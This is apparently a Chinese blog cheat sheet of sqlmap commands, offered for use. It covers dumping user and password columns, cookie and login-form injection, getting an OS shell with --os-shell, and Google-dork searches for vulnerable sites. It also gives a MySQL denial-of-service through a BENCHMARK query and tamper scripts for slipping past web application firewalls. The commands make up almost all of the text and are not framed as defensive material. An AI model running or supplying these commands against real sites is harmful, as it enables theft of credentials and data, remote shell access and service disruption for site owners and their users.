sqlmap 小记

1&&2.
sqlmap -u "url" --dbs
sqlmap -u "url" -D somedatabase --tables
sqlmap -u "url" -D somedatabase -T sometable --columns
sqlmap -u "url" -D somedatabase -T sometable -C "user,password" --dump
3.cookie注入
sqlmap -u "http://www.*/Show.asp" --cookie "id=9" --table --level 2

4.post登陆框注入
注入点:http://test.com/Login.asp
sqlmap -u http://test.com/Login.asp --forms
sqlmap -u http://test.com/Login.asp --data "tfUName=1&tfUPass=1"


几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass
search-test.txt为截获的http包  tfupass为注入的参数

5.写入交互shell
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
需要知道站点的根目录

6.伪静态注入
eg:url:  http://******/40.html
---> sqlmap -u http://******/40*.html --dbs
7.请求延时  --delay 1 延时1s     --safe-freq 3   3次
8.sqlmap结合google搜索 sqlmap -g inurl:php?id=
9.sqlmap--mysql dos 攻击
sqlmap-u http://192.168.159.1/news.php?id=1 --sql-shell
sql-shell>  select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
10.waf防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs  --batch --tamper "space2morehash.py"
space2hash.py   base64encode.py charencode.py
采用不同的编码方式绕过





评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值